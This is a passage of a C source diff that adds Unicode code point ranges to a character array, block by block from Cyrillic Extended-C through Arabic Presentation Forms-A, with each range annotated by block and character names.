+	c = 0x1c80;		// from CYRILLIC SMALL LETTER ROUNDED VE
+	while (c <= 0x1c88)	// ..to CYRILLIC SMALL LETTER UNBLENDED UK
+		charset[i++] = c++;
+// 1C90..1CBF; Georgian Extended
+	c = 0x1c90;		// from GEORGIAN MTAVRULI CAPITAL LETTER AN
+	while (c <= 0x1cba)	// ..to GEORGIAN MTAVRULI CAPITAL LETTER AIN
+		charset[i++] = c++;
+	charset[i++] = 0x1cbd;	// GEORGIAN MTAVRULI CAPITAL LETTER AEN
+	charset[i++] = 0x1cbf;	// GEORGIAN MTAVRULI CAPITAL LETTER LABIAL SIGN
+// 1CC0..1CCF; Sundanese Supplement
+	c = 0x1cc0;		// from SUNDANESE PUNCTUATION BINDU SURYA
+	while (c <= 0x1cc7)	// ..to SUNDANESE PUNCTUATION BINDU BA SATANGA
+		charset[i++] = c++;
+// 1CD0..1CFF; Vedic Extensions
+	c = 0x1cd0;		// from VEDIC TONE KARSHANA
+	while (c <= 0x1cf9)	// ..to VEDIC TONE DOUBLE RING ABOVE
+		charset[i++] = c++;
+// 1D00..1D7F; Phonetic Extensions
+	c = 0x1d00;		// from LATIN LETTER SMALL CAPITAL A
+	while (c <= 0x1d7f)	// ..to LATIN SMALL LETTER UPSILON WITH STROKE
+		charset[i++] = c++;
+// 1D80..1DBF; Phonetic Extensions Supplement
+	c = 0x1d80;		// from LATIN SMALL LETTER B WITH PALATAL HOOK
+	while (c <= 0x1dbf)	// ..to MODIFIER LETTER SMALL THETA
+		charset[i++] = c++;
+// 1DC0..1DFF; Combining Diacritical Marks Supplement
+	c = 0x1dc0;		// from COMBINING DOTTED GRAVE ACCENT
+	while (c <= 0x1df9)	// ..to COMBINING WIDE INVERTED BRIDGE BELOW
+		charset[i++] = c++;
+	c = 0x1dfb;		// from COMBINING DELETION MARK
+	while (c <= 0x1dff)	// ..to COMBINING RIGHT ARROWHEAD AND DOWN ARROWHEAD BELOW
+		charset[i++] = c++;
+// 1E00..1EFF; Latin Extended Additional
+	c = 0x1e00;		// from LATIN CAPITAL LETTER A WITH RING BELOW
+	while (c <= 0x1eff)	// ..to LATIN SMALL LETTER Y WITH LOOP
+		charset[i++] = c++;
+// 1F00..1FFF; Greek Extended
+	c = 0x1f00;		// from GREEK SMALL LETTER ALPHA WITH PSILI
+	while (c <= 0x1f15)	// ..to GREEK SMALL LETTER EPSILON WITH DASIA AND OXIA
+		charset[i++] = c++;
+	c = 0x1f18;		// from GREEK CAPITAL LETTER EPSILON WITH PSILI
+	while (c <= 0x1f1d)	// ..to GREEK CAPITAL LETTER EPSILON WITH DASIA AND OXIA
+		charset[i++] = c++;
+	c = 0x1f20;		// from GREEK SMALL LETTER ETA WITH PSILI
+	while (c <= 0x1f45)	// ..to GREEK SMALL LETTER OMICRON WITH DASIA AND OXIA
+		charset[i++] = c++;
+	c = 0x1f48;		// from GREEK CAPITAL LETTER OMICRON WITH PSILI
+	while (c <= 0x1f4d)	// ..to GREEK CAPITAL LETTER OMICRON WITH DASIA AND OXIA
+		charset[i++] = c++;
+	c = 0x1f50;		// from GREEK SMALL LETTER UPSILON WITH PSILI
+	while (c <= 0x1f57)	// ..to GREEK SMALL LETTER UPSILON WITH DASIA AND PERISPOMENI
+		charset[i++] = c++;
+	c = 0x1f5f;		// from GREEK CAPITAL LETTER UPSILON WITH DASIA AND PERISPOMENI
+	while (c <= 0x1f7d)	// ..to GREEK SMALL LETTER OMEGA WITH OXIA
+		charset[i++] = c++;
+	c = 0x1f80;		// from GREEK SMALL LETTER ALPHA WITH PSILI AND YPOGEGRAMMENI
+	while (c <= 0x1fb4)	// ..to GREEK SMALL LETTER ALPHA WITH OXIA AND YPOGEGRAMMENI
+		charset[i++] = c++;
+	c = 0x1fb6;		// from GREEK SMALL LETTER ALPHA WITH PERISPOMENI
+	while (c <= 0x1fc4)	// ..to GREEK SMALL LETTER ETA WITH OXIA AND YPOGEGRAMMENI
+		charset[i++] = c++;
+	c = 0x1fc6;		// from GREEK SMALL LETTER ETA WITH PERISPOMENI
+	while (c <= 0x1fd3)	// ..to GREEK SMALL LETTER IOTA WITH DIALYTIKA AND OXIA
+		charset[i++] = c++;
+	c = 0x1fd6;		// from GREEK SMALL LETTER IOTA WITH PERISPOMENI
+	while (c <= 0x1fdb)	// ..to GREEK CAPITAL LETTER IOTA WITH OXIA
+		charset[i++] = c++;
+	c = 0x1fdd;		// from GREEK DASIA AND VARIA
+	while (c <= 0x1fef)	// ..to GREEK VARIA
+		charset[i++] = c++;
+	charset[i++] = 0x1ff2;	// GREEK SMALL LETTER OMEGA WITH VARIA AND YPOGEGRAMMENI
+	charset[i++] = 0x1ff4;	// GREEK SMALL LETTER OMEGA WITH OXIA AND YPOGEGRAMMENI
+	c = 0x1ff6;		// from GREEK SMALL LETTER OMEGA WITH PERISPOMENI
+	while (c <= 0x1ffe)	// ..to GREEK DASIA
+		charset[i++] = c++;
+// 2000..206F; General Punctuation
+	c = 0x2000;		// from EN QUAD
+	while (c <= 0x2064)	// ..to INVISIBLE PLUS
+		charset[i++] = c++;
+	c = 0x2066;		// from LEFT-TO-RIGHT ISOLATE
+	while (c <= 0x206f)	// ..to NOMINAL DIGIT SHAPES
+		charset[i++] = c++;
+// 2070..209F; Superscripts and Subscripts
+	charset[i++] = 0x2070;	// SUPERSCRIPT ZERO
+	charset[i++] = 0x2071;	// SUPERSCRIPT LATIN SMALL LETTER I
+	c = 0x2074;		// from SUPERSCRIPT FOUR
+	while (c <= 0x208e)	// ..to SUBSCRIPT RIGHT PARENTHESIS
+		charset[i++] = c++;
+	c = 0x2090;		// from LATIN SUBSCRIPT SMALL LETTER A
+	while (c <= 0x209c)	// ..to LATIN SUBSCRIPT SMALL LETTER T
+		charset[i++] = c++;
+// 20A0..20CF; Currency Symbols
+	c = 0x20a0;		// from EURO-CURRENCY SIGN
+	while (c <= 0x20bf)	// ..to BITCOIN SIGN
+		charset[i++] = c++;
+// 20D0..20FF; Combining Diacritical Marks for Symbols
+	c = 0x20d0;		// from COMBINING LEFT HARPOON ABOVE
+	while (c <= 0x20f0)	// ..to COMBINING ASTERISK ABOVE
+		charset[i++] = c++;
+// 2100..214F; Letterlike Symbols
+	c = 0x2100;		// from ACCOUNT OF
+	while (c <= 0x214f)	// ..to SYMBOL FOR SAMARITAN SOURCE
+		charset[i++] = c++;
+// 2150..218F; Number Forms
+	c = 0x2150;		// from VULGAR FRACTION ONE SEVENTH
+	while (c <= 0x218b)	// ..to TURNED DIGIT THREE
+		charset[i++] = c++;
+// 2190..21FF; Arrows
+	c = 0x2190;		// from LEFTWARDS ARROW
+	while (c <= 0x21ff)	// ..to LEFT RIGHT OPEN-HEADED ARROW
+		charset[i++] = c++;
+// 2200..22FF; Mathematical Operators
+	c = 0x2200;		// from FOR ALL
+	while (c <= 0x22ff)	// ..to Z NOTATION BAG MEMBERSHIP
+		charset[i++] = c++;
+// 2300..23FF; Miscellaneous Technical
+	c = 0x2300;		// from DIAMETER SIGN
+	while (c <= 0x23ff)	// ..to OBSERVER EYE SYMBOL
+		charset[i++] = c++;
+// 2400..243F; Control Pictures
+	c = 0x2400;		// from SYMBOL FOR NULL
+	while (c <= 0x2426)	// ..to SYMBOL FOR SUBSTITUTE FORM TWO
+		charset[i++] = c++;
+// 2440..245F; Optical Character Recognition
+	c = 0x2440;		// from OCR HOOK
+	while (c <= 0x244a)	// ..to OCR DOUBLE BACKSLASH
+		charset[i++] = c++;
+// 2460..24FF; Enclosed Alphanumerics
+	c = 0x2460;		// from CIRCLED DIGIT ONE
+	while (c <= 0x24ff)	// ..to NEGATIVE CIRCLED DIGIT ZERO
+		charset[i++] = c++;
+// 2500..257F; Box Drawing
+	c = 0x2500;		// from BOX DRAWINGS LIGHT HORIZONTAL
+	while (c <= 0x257f)	// ..to BOX DRAWINGS HEAVY UP AND LIGHT DOWN
+		charset[i++] = c++;
+// 2580..259F; Block Elements
+	c = 0x2580;		// from UPPER HALF BLOCK
+	while (c <= 0x259f)	// ..to QUADRANT UPPER RIGHT AND LOWER LEFT AND LOWER RIGHT
+		charset[i++] = c++;
+// 25A0..25FF; Geometric Shapes
+	c = 0x25a0;		// from BLACK SQUARE
+	while (c <= 0x25ff)	// ..to LOWER RIGHT TRIANGLE
+		charset[i++] = c++;
+// 2600..26FF; Miscellaneous Symbols
+	c = 0x2600;		// from BLACK SUN WITH RAYS
+	while (c <= 0x26ff)	// ..to WHITE FLAG WITH HORIZONTAL MIDDLE BLACK STRIPE
+		charset[i++] = c++;
+// 2700..27BF; Dingbats
+	c = 0x2700;		// from BLACK SAFETY SCISSORS
+	while (c <= 0x27bf)	// ..to DOUBLE CURLY LOOP
+		charset[i++] = c++;
+// 27C0..27EF; Miscellaneous Mathematical Symbols-A
+	c = 0x27c0;		// from THREE DIMENSIONAL ANGLE
+	while (c <= 0x27ef)	// ..to MATHEMATICAL RIGHT FLATTENED PARENTHESIS
+		charset[i++] = c++;
+// 27F0..27FF; Supplemental Arrows-A
+	c = 0x27f0;		// from UPWARDS QUADRUPLE ARROW
+	while (c <= 0x27ff)	// ..to LONG RIGHTWARDS SQUIGGLE ARROW
+		charset[i++] = c++;
+// 2800..28FF; Braille Patterns
+	c = 0x2800;		// from BRAILLE PATTERN BLANK
+	while (c <= 0x28ff)	// ..to BRAILLE PATTERN DOTS-12345678
+		charset[i++] = c++;
+// 2900..297F; Supplemental Arrows-B
+	c = 0x2900;		// from RIGHTWARDS TWO-HEADED ARROW WITH VERTICAL STROKE
+	while (c <= 0x297f)	// ..to DOWN FISH TAIL
+		charset[i++] = c++;
+// 2980..29FF; Miscellaneous Mathematical Symbols-B
+	c = 0x2980;		// from TRIPLE VERTICAL BAR DELIMITER
+	while (c <= 0x29ff)	// ..to MINY
+		charset[i++] = c++;
+// 2A00..2AFF; Supplemental Mathematical Operators
+	c = 0x2a00;		// from N-ARY CIRCLED DOT OPERATOR
+	while (c <= 0x2aff)	// ..to N-ARY WHITE VERTICAL BAR
+		charset[i++] = c++;
+// 2B00..2BFF; Miscellaneous Symbols and Arrows
+	c = 0x2b00;		// from NORTH EAST WHITE ARROW
+	while (c <= 0x2b73)	// ..to DOWNWARDS TRIANGLE-HEADED ARROW TO BAR
+		charset[i++] = c++;
+	c = 0x2b76;		// from NORTH WEST TRIANGLE-HEADED ARROW TO BAR
+	while (c <= 0x2b95)	// ..to RIGHTWARDS BLACK ARROW
+		charset[i++] = c++;
+	c = 0x2b98;		// from THREE-D TOP-LIGHTED LEFTWARDS EQUILATERAL ARROWHEAD
+	while (c <= 0x2bc8)	// ..to BLACK MEDIUM RIGHT-POINTING TRIANGLE CENTRED
+		charset[i++] = c++;
+	c = 0x2bca;		// from TOP HALF BLACK CIRCLE
+	while (c <= 0x2bfe)	// ..to REVERSED RIGHT ANGLE
+		charset[i++] = c++;
+// 2C00..2C5F; Glagolitic
+	c = 0x2c00;		// from GLAGOLITIC CAPITAL LETTER AZU
+	while (c <= 0x2c2e)	// ..to GLAGOLITIC CAPITAL LETTER LATINATE MYSLITE
+		charset[i++] = c++;
+	c = 0x2c30;		// from GLAGOLITIC SMALL LETTER AZU
+	while (c <= 0x2c5e)	// ..to GLAGOLITIC SMALL LETTER LATINATE MYSLITE
+		charset[i++] = c++;
+// 2C60..2C7F; Latin Extended-C
+	c = 0x2c60;		// from LATIN CAPITAL LETTER L WITH DOUBLE BAR
+	while (c <= 0x2c7f)	// ..to LATIN CAPITAL LETTER Z WITH SWASH TAIL
+		charset[i++] = c++;
+// 2C80..2CFF; Coptic
+	c = 0x2c80;		// from COPTIC CAPITAL LETTER ALFA
+	while (c <= 0x2cf3)	// ..to COPTIC SMALL LETTER BOHAIRIC KHEI
+		charset[i++] = c++;
+	c = 0x2cf9;		// from COPTIC OLD NUBIAN FULL STOP
+	while (c <= 0x2cff)	// ..to COPTIC MORPHOLOGICAL DIVIDER
+		charset[i++] = c++;
+// 2D00..2D2F; Georgian Supplement
+	c = 0x2d00;		// from GEORGIAN SMALL LETTER AN
+	while (c <= 0x2d25)	// ..to GEORGIAN SMALL LETTER HOE
+		charset[i++] = c++;
+	c = 0x2d27;		// from GEORGIAN SMALL LETTER YN
+	while (c <= 0x2d2d)	// ..to GEORGIAN SMALL LETTER AEN
+		charset[i++] = c++;
+// 2D30..2D7F; Tifinagh
+	c = 0x2d30;		// from TIFINAGH LETTER YA
+	while (c <= 0x2d67)	// ..to TIFINAGH LETTER YO
+		charset[i++] = c++;
+	charset[i++] = 0x2d6f;	// TIFINAGH MODIFIER LETTER LABIALIZATION MARK
+	charset[i++] = 0x2d70;	// TIFINAGH SEPARATOR MARK
+	charset[i++] = 0x2d7f;	// TIFINAGH CONSONANT JOINER
+// 2D80..2DDF; Ethiopic Extended
+	c = 0x2d80;		// from ETHIOPIC SYLLABLE LOA
+	while (c <= 0x2d96)	// ..to ETHIOPIC SYLLABLE GGWE
+		charset[i++] = c++;
+	c = 0x2da0;		// from ETHIOPIC SYLLABLE SSA
+	while (c <= 0x2da6)	// ..to ETHIOPIC SYLLABLE SSO
+		charset[i++] = c++;
+	c = 0x2da8;		// from ETHIOPIC SYLLABLE CCA
+	while (c <= 0x2dae)	// ..to ETHIOPIC SYLLABLE CCO
+		charset[i++] = c++;
+	c = 0x2db0;		// from ETHIOPIC SYLLABLE ZZA
+	while (c <= 0x2db6)	// ..to ETHIOPIC SYLLABLE ZZO
+		charset[i++] = c++;
+	c = 0x2db8;		// from ETHIOPIC SYLLABLE CCHA
+	while (c <= 0x2dbe)	// ..to ETHIOPIC SYLLABLE CCHO
+		charset[i++] = c++;
+	c = 0x2dc0;		// from ETHIOPIC SYLLABLE QYA
+	while (c <= 0x2dc6)	// ..to ETHIOPIC SYLLABLE QYO
+		charset[i++] = c++;
+	c = 0x2dc8;		// from ETHIOPIC SYLLABLE KYA
+	while (c <= 0x2dce)	// ..to ETHIOPIC SYLLABLE KYO
+		charset[i++] = c++;
+	c = 0x2dd0;		// from ETHIOPIC SYLLABLE XYA
+	while (c <= 0x2dd6)	// ..to ETHIOPIC SYLLABLE XYO
+		charset[i++] = c++;
+	c = 0x2dd8;		// from ETHIOPIC SYLLABLE GYA
+	while (c <= 0x2dde)	// ..to ETHIOPIC SYLLABLE GYO
+		charset[i++] = c++;
+// 2DE0..2DFF; Cyrillic Extended-A
+	c = 0x2de0;		// from COMBINING CYRILLIC LETTER BE
+	while (c <= 0x2dff)	// ..to COMBINING CYRILLIC LETTER IOTIFIED BIG YUS
+		charset[i++] = c++;
+// 2E00..2E7F; Supplemental Punctuation
+	c = 0x2e00;		// from RIGHT ANGLE SUBSTITUTION MARKER
+	while (c <= 0x2e4e)	// ..to PUNCTUS ELEVATUS MARK
+		charset[i++] = c++;
+// 2E80..2EFF; CJK Radicals Supplement
+	c = 0x2e80;		// from CJK RADICAL REPEAT
+	while (c <= 0x2e99)	// ..to CJK RADICAL RAP
+		charset[i++] = c++;
+	c = 0x2e9b;		// from CJK RADICAL CHOKE
+	while (c <= 0x2ef3)	// ..to CJK RADICAL C-SIMPLIFIED TURTLE
+		charset[i++] = c++;
+// 2F00..2FDF; Kangxi Radicals
+	c = 0x2f00;		// from KANGXI RADICAL ONE
+	while (c <= 0x2fd5)	// ..to KANGXI RADICAL FLUTE
+		charset[i++] = c++;
+// 2FF0..2FFF; Ideographic Description Characters
+	c = 0x2ff0;		// from IDEOGRAPHIC DESCRIPTION CHARACTER LEFT TO RIGHT
+	while (c <= 0x2ffb)	// ..to IDEOGRAPHIC DESCRIPTION CHARACTER OVERLAID
+		charset[i++] = c++;
+// 3000..303F; CJK Symbols and Punctuation
+	c = 0x3000;		// from IDEOGRAPHIC SPACE
+	while (c <= 0x303f)	// ..to IDEOGRAPHIC HALF FILL SPACE
+		charset[i++] = c++;
+// 3040..309F; Hiragana
+	c = 0x3041;		// from HIRAGANA LETTER SMALL A
+	while (c <= 0x3096)	// ..to HIRAGANA LETTER SMALL KE
+		charset[i++] = c++;
+	c = 0x3099;		// from COMBINING KATAKANA-HIRAGANA VOICED SOUND MARK
+	while (c <= 0x309f)	// ..to HIRAGANA DIGRAPH YORI
+		charset[i++] = c++;
+// 30A0..30FF; Katakana
+	c = 0x30a0;		// from KATAKANA-HIRAGANA DOUBLE HYPHEN
+	while (c <= 0x30ff)	// ..to KATAKANA DIGRAPH KOTO
+		charset[i++] = c++;
+// 3100..312F; Bopomofo
+	c = 0x3105;		// from BOPOMOFO LETTER B
+	while (c <= 0x312f)	// ..to BOPOMOFO LETTER NN
+		charset[i++] = c++;
+// 3130..318F; Hangul Compatibility Jamo
+	c = 0x3131;		// from HANGUL LETTER KIYEOK
+	while (c <= 0x318e)	// ..to HANGUL LETTER ARAEAE
+		charset[i++] = c++;
+// 3190..319F; Kanbun
+	c = 0x3190;		// from IDEOGRAPHIC ANNOTATION LINKING MARK
+	while (c <= 0x319f)	// ..to IDEOGRAPHIC ANNOTATION MAN MARK
+		charset[i++] = c++;
+// 31A0..31BF; Bopomofo Extended
+	c = 0x31a0;		// from BOPOMOFO LETTER BU
+	while (c <= 0x31ba)	// ..to BOPOMOFO LETTER ZY
+		charset[i++] = c++;
+// 31C0..31EF; CJK Strokes
+	c = 0x31c0;		// from CJK STROKE T
+	while (c <= 0x31e3)	// ..to CJK STROKE Q
+		charset[i++] = c++;
+// 31F0..31FF; Katakana Phonetic Extensions
+	c = 0x31f0;		// from KATAKANA LETTER SMALL KU
+	while (c <= 0x31ff)	// ..to KATAKANA LETTER SMALL RO
+		charset[i++] = c++;
+// 3200..32FF; Enclosed CJK Letters and Months
+	c = 0x3200;		// from PARENTHESIZED HANGUL KIYEOK
+	while (c <= 0x321e)	// ..to PARENTHESIZED KOREAN CHARACTER O HU
+		charset[i++] = c++;
+	c = 0x3220;		// from PARENTHESIZED IDEOGRAPH ONE
+	while (c <= 0x32fe)	// ..to CIRCLED KATAKANA WO
+		charset[i++] = c++;
+// 3300..33FF; CJK Compatibility
+	c = 0x3300;		// from SQUARE APAATO
+	while (c <= 0x33ff)	// ..to SQUARE GAL
+		charset[i++] = c++;
+// 3400..4DBF; CJK Unified Ideographs Extension A
+	c = 0x3400;		// from <CJK Ideograph Extension A, First>
+	while (c <= 0x4db5)	// ..to <CJK Ideograph Extension A, Last>
+		charset[i++] = c++;
+// 4DC0..4DFF; Yijing Hexagram Symbols
+	c = 0x4dc0;		// from HEXAGRAM FOR THE CREATIVE HEAVEN
+	while (c <= 0x4dff)	// ..to HEXAGRAM FOR BEFORE COMPLETION
+		charset[i++] = c++;
+// 4E00..9FFF; CJK Unified Ideographs
+	c = 0x4e00;		// from <CJK Ideograph, First>
+	while (c <= 0x9fef)	// ..to <CJK Ideograph, Last>
+		charset[i++] = c++;
+// A000..A48F; Yi Syllables
+	c = 0xa000;		// from YI SYLLABLE IT
+	while (c <= 0xa48c)	// ..to YI SYLLABLE YYR
+		charset[i++] = c++;
+// A490..A4CF; Yi Radicals
+	c = 0xa490;		// from YI RADICAL QOT
+	while (c <= 0xa4c6)	// ..to YI RADICAL KE
+		charset[i++] = c++;
+// A4D0..A4FF; Lisu
+	c = 0xa4d0;		// from LISU LETTER BA
+	while (c <= 0xa4ff)	// ..to LISU PUNCTUATION FULL STOP
+		charset[i++] = c++;
+// A500..A63F; Vai
+	c = 0xa500;		// from VAI SYLLABLE EE
+	while (c <= 0xa62b)	// ..to VAI SYLLABLE NDOLE DO
+		charset[i++] = c++;
+// A640..A69F; Cyrillic Extended-B
+	c = 0xa640;		// from CYRILLIC CAPITAL LETTER ZEMLYA
+	while (c <= 0xa69f)	// ..to COMBINING CYRILLIC LETTER IOTIFIED E
+		charset[i++] = c++;
+// A6A0..A6FF; Bamum
+	c = 0xa6a0;		// from BAMUM LETTER A
+	while (c <= 0xa6f7)	// ..to BAMUM QUESTION MARK
+		charset[i++] = c++;
+// A700..A71F; Modifier Tone Letters
+	c = 0xa700;		// from MODIFIER LETTER CHINESE TONE YIN PING
+	while (c <= 0xa71f)	// ..to MODIFIER LETTER LOW INVERTED EXCLAMATION MARK
+		charset[i++] = c++;
+// A720..A7FF; Latin Extended-D
+	c = 0xa720;		// from MODIFIER LETTER STRESS AND HIGH TONE
+	while (c <= 0xa7b9)	// ..to LATIN SMALL LETTER U WITH STROKE
+		charset[i++] = c++;
+	c = 0xa7f7;		// from LATIN EPIGRAPHIC LETTER SIDEWAYS I
+	while (c <= 0xa7ff)	// ..to LATIN EPIGRAPHIC LETTER ARCHAIC M
+		charset[i++] = c++;
+// A800..A82F; Syloti Nagri
+	c = 0xa800;		// from SYLOTI NAGRI LETTER A
+	while (c <= 0xa82b)	// ..to SYLOTI NAGRI POETRY MARK-4
+		charset[i++] = c++;
+// A830..A83F; Common Indic Number Forms
+	c = 0xa830;		// from NORTH INDIC FRACTION ONE QUARTER
+	while (c <= 0xa839)	// ..to NORTH INDIC QUANTITY MARK
+		charset[i++] = c++;
+// A840..A87F; Phags-pa
+	c = 0xa840;		// from PHAGS-PA LETTER KA
+	while (c <= 0xa877)	// ..to PHAGS-PA MARK DOUBLE SHAD
+		charset[i++] = c++;
+// A880..A8DF; Saurashtra
+	c = 0xa880;		// from SAURASHTRA SIGN ANUSVARA
+	while (c <= 0xa8c5)	// ..to SAURASHTRA SIGN CANDRABINDU
+		charset[i++] = c++;
+	c = 0xa8ce;		// from SAURASHTRA DANDA
+	while (c <= 0xa8d9)	// ..to SAURASHTRA DIGIT NINE
+		charset[i++] = c++;
+// A8E0..A8FF; Devanagari Extended
+	c = 0xa8e0;		// from COMBINING DEVANAGARI DIGIT ZERO
+	while (c <= 0xa8ff)	// ..to DEVANAGARI VOWEL SIGN AY
+		charset[i++] = c++;
+// A900..A92F; Kayah Li
+	c = 0xa900;		// from KAYAH LI DIGIT ZERO
+	while (c <= 0xa92f)	// ..to KAYAH LI SIGN SHYA
+		charset[i++] = c++;
+// A930..A95F; Rejang
+	c = 0xa930;		// from REJANG LETTER KA
+	while (c <= 0xa953)	// ..to REJANG VIRAMA
+		charset[i++] = c++;
+	charset[i++] = 0xa95f;	// REJANG SECTION MARK
+// A960..A97F; Hangul Jamo Extended-A
+	c = 0xa960;		// from HANGUL CHOSEONG TIKEUT-MIEUM
+	while (c <= 0xa97c)	// ..to HANGUL CHOSEONG SSANGYEORINHIEUH
+		charset[i++] = c++;
+// A980..A9DF; Javanese
+	c = 0xa980;		// from JAVANESE SIGN PANYANGGA
+	while (c <= 0xa9cd)	// ..to JAVANESE TURNED PADA PISELEH
+		charset[i++] = c++;
+	c = 0xa9cf;		// from JAVANESE PANGRANGKEP
+	while (c <= 0xa9d9)	// ..to JAVANESE DIGIT NINE
+		charset[i++] = c++;
+	charset[i++] = 0xa9de;	// JAVANESE PADA TIRTA TUMETES
+	charset[i++] = 0xa9df;	// JAVANESE PADA ISEN-ISEN
+// A9E0..A9FF; Myanmar Extended-B
+	c = 0xa9e0;		// from MYANMAR LETTER SHAN GHA
+	while (c <= 0xa9fe)	// ..to MYANMAR LETTER TAI LAING BHA
+		charset[i++] = c++;
+// AA00..AA5F; Cham
+	c = 0xaa00;		// from CHAM LETTER A
+	while (c <= 0xaa36)	// ..to CHAM CONSONANT SIGN WA
+		charset[i++] = c++;
+	c = 0xaa40;		// from CHAM LETTER FINAL K
+	while (c <= 0xaa4d)	// ..to CHAM CONSONANT SIGN FINAL H
+		charset[i++] = c++;
+	c = 0xaa50;		// from CHAM DIGIT ZERO
+	while (c <= 0xaa59)	// ..to CHAM DIGIT NINE
+		charset[i++] = c++;
+	c = 0xaa5c;		// from CHAM PUNCTUATION SPIRAL
+	while (c <= 0xaa5f)	// ..to CHAM PUNCTUATION TRIPLE DANDA
+		charset[i++] = c++;
+// AA60..AA7F; Myanmar Extended-A
+	c = 0xaa60;		// from MYANMAR LETTER KHAMTI GA
+	while (c <= 0xaa7f)	// ..to MYANMAR LETTER SHWE PALAUNG SHA
+		charset[i++] = c++;
+// AA80..AADF; Tai Viet
+	c = 0xaa80;		// from TAI VIET LETTER LOW KO
+	while (c <= 0xaac2)	// ..to TAI VIET TONE MAI SONG
+		charset[i++] = c++;
+	c = 0xaadb;		// from TAI VIET SYMBOL KON
+	while (c <= 0xaadf)	// ..to TAI VIET SYMBOL KOI KOI
+		charset[i++] = c++;
+// AAE0..AAFF; Meetei Mayek Extensions
+	c = 0xaae0;		// from MEETEI MAYEK LETTER E
+	while (c <= 0xaaf6)	// ..to MEETEI MAYEK VIRAMA
+		charset[i++] = c++;
+// AB00..AB2F; Ethiopic Extended-A
+	c = 0xab01;		// from ETHIOPIC SYLLABLE TTHU
+	while (c <= 0xab06)	// ..to ETHIOPIC SYLLABLE TTHO
+		charset[i++] = c++;
+	c = 0xab09;		// from ETHIOPIC SYLLABLE DDHU
+	while (c <= 0xab0e)	// ..to ETHIOPIC SYLLABLE DDHO
+		charset[i++] = c++;
+	c = 0xab11;		// from ETHIOPIC SYLLABLE DZU
+	while (c <= 0xab16)	// ..to ETHIOPIC SYLLABLE DZO
+		charset[i++] = c++;
+	c = 0xab20;		// from ETHIOPIC SYLLABLE CCHHA
+	while (c <= 0xab26)	// ..to ETHIOPIC SYLLABLE CCHHO
+		charset[i++] = c++;
+	c = 0xab28;		// from ETHIOPIC SYLLABLE BBA
+	while (c <= 0xab2e)	// ..to ETHIOPIC SYLLABLE BBO
+		charset[i++] = c++;
+// AB30..AB6F; Latin Extended-E
+	c = 0xab30;		// from LATIN SMALL LETTER BARRED ALPHA
+	while (c <= 0xab65)	// ..to GREEK LETTER SMALL CAPITAL OMEGA
+		charset[i++] = c++;
+// AB70..ABBF; Cherokee Supplement
+	c = 0xab70;		// from CHEROKEE SMALL LETTER A
+	while (c <= 0xabbf)	// ..to CHEROKEE SMALL LETTER YA
+		charset[i++] = c++;
+// ABC0..ABFF; Meetei Mayek
+	c = 0xabc0;		// from MEETEI MAYEK LETTER KOK
+	while (c <= 0xabed)	// ..to MEETEI MAYEK APUN IYEK
+		charset[i++] = c++;
+	c = 0xabf0;		// from MEETEI MAYEK DIGIT ZERO
+	while (c <= 0xabf9)	// ..to MEETEI MAYEK DIGIT NINE
+		charset[i++] = c++;
+// AC00..D7AF; Hangul Syllables
+	c = 0xac00;		// from <Hangul Syllable, First>
+	while (c <= 0xd7a3)	// ..to <Hangul Syllable, Last>
+		charset[i++] = c++;
+// D7B0..D7FF; Hangul Jamo Extended-B
+	c = 0xd7b0;		// from HANGUL JUNGSEONG O-YEO
+	while (c <= 0xd7c6)	// ..to HANGUL JUNGSEONG ARAEA-E
+		charset[i++] = c++;
+	c = 0xd7cb;		// from HANGUL JONGSEONG NIEUN-RIEUL
+	while (c <= 0xd7fb)	// ..to HANGUL JONGSEONG PHIEUPH-THIEUTH
+		charset[i++] = c++;
+// D800..DB7F; High Surrogates
+// DB80..DBFF; High Private Use Surrogates
+// DC00..DFFF; Low Surrogates
+// E000..F8FF; Private Use Area
+// F900..FAFF; CJK Compatibility Ideographs
+	c = 0xf900;		// from CJK COMPATIBILITY IDEOGRAPH-F900
+	while (c <= 0xfa6d)	// ..to CJK COMPATIBILITY IDEOGRAPH-FA6D
+		charset[i++] = c++;
+	c = 0xfa70;		// from CJK COMPATIBILITY IDEOGRAPH-FA70
+	while (c <= 0xfad9)	// ..to CJK COMPATIBILITY IDEOGRAPH-FAD9
+		charset[i++] = c++;
+// FB00..FB4F; Alphabetic Presentation Forms
+	c = 0xfb00;		// from LATIN SMALL LIGATURE FF
+	while (c <= 0xfb06)	// ..to LATIN SMALL LIGATURE ST
+		charset[i++] = c++;
+	c = 0xfb13;		// from ARMENIAN SMALL LIGATURE MEN NOW
+	while (c <= 0xfb17)	// ..to ARMENIAN SMALL LIGATURE MEN XEH
+		charset[i++] = c++;
+	c = 0xfb1d;		// from HEBREW LETTER YOD WITH HIRIQ
+	while (c <= 0xfb36)	// ..to HEBREW LETTER ZAYIN WITH DAGESH
+		charset[i++] = c++;
+	c = 0xfb38;		// from HEBREW LETTER TET WITH DAGESH
+	while (c <= 0xfb3c)	// ..to HEBREW LETTER LAMED WITH DAGESH
+		charset[i++] = c++;
+	charset[i++] = 0xfb40;	// HEBREW LETTER NUN WITH DAGESH
+	charset[i++] = 0xfb41;	// HEBREW LETTER SAMEKH WITH DAGESH
+	charset[i++] = 0xfb43;	// HEBREW LETTER FINAL PE WITH DAGESH
+	charset[i++] = 0xfb44;	// HEBREW LETTER PE WITH DAGESH
+	c = 0xfb46;		// from HEBREW LETTER TSADI WITH DAGESH
+	while (c <= 0xfb4f)	// ..to HEBREW LIGATURE ALEF LAMED
+		charset[i++] = c++;
+// FB50..FDFF; Arabic Presentation Forms-A
+	c = 0xfb50;		// from ARABIC LETTER ALEF WASLA ISOLATED FORM
+	while (c <= 0xfbc1)	// ..to ARABIC SYMBOL SMALL TAH BELOW
+		charset[i++] = c++;
+	c = 0xfbd3;		// from ARABIC LETTER NG ISOLATED FORM
+	while (c <= 0xfd3f)	// ..to ORNATE RIGHT PARENTHESIS
+		charset[i++] = c++;
+	c = 0xfd50;		// from ARABIC LIGATURE TEH WITH JEEM WITH MEEM INITIAL FORM
+	while (c <= 0xfd8f)	// ..to ARABIC LIGATURE MEEM WITH KHAH WITH MEEM INITIAL FORM
+		charset[i++] = c++;
+	c = 0xfd92;		// from ARABIC LIGATURE MEEM WITH JEEM WITH KHAH INITIAL FORM
+	while (c <= 0xfdc7)	// ..to ARABIC LIGATURE NOON WITH JEEM WITH YEH FINAL FORM
+		charset[i++] = c++;
+	c = 0xfdf0;		// from ARABIC LIGATURE SALLA USED AS KORANIC STOP SIGN ISOLATED FORM
+	while (c <= 0xfdfd)	// ..to ARABIC LIGATURE BISMILLAH AR-RAHMAN AR-RAHEEM
+		charset[i++] = c++;
